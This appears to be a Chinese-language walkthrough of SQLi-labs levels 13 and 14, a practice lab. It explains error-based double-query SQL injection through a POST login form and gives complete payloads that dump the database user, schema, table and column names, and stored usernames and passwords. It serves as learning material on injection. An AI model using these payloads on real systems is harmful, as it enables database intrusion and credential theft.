Less13

双注入_POST_单引号_小括号_字符型注入

0x01. 双注入应用范围

同Less5和Less6：
正确回显是固定字符串（无回显），这里页面显示flag,jpg这张图片；
错误回显是Mysql错误信息，这里页面显示slap.jpg这张图片。

flag.jpg slap.jpg

一般注入是通过正确回显（Mysql数据）返回查询的数据，双注入则是通过错误回显（Mysql错误信息）返回。

0x02. 注入过程

步骤1：用户名和数据库名

uname=1&passwd=1') union select count(*),concat_ws('-',(select user()),(select database()),floor(rand()*2)) as a from information_schema.tables group by a--+

用户名root，数据库名security

步骤2：表名

uname=1&passwd=1') union select count(*),concat_ws('-',(select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand()*2)) as a from information_schema.tables group by a--+

表名users

步骤3：字段名

uname=1&passwd=1') union select count(*),concat_ws('-',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),floor(rand()*2)) as a from information_schema.tables group by a--+

字段名username、password

步骤4：数据

uname=1&passwd=1') union select count(*),concat_ws('-',(select concat_ws('-',id,username,password) from users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a--+

因为这里只能查询一行，所以不能用group_concat()，可以修改limit的范围来遍历用户信息。

Less14

双注入_POST_双引号_字符型注入

和Less13差别在于单双引号和小括号，在报错回显中能够直接看出双引号，用同样的方式注入。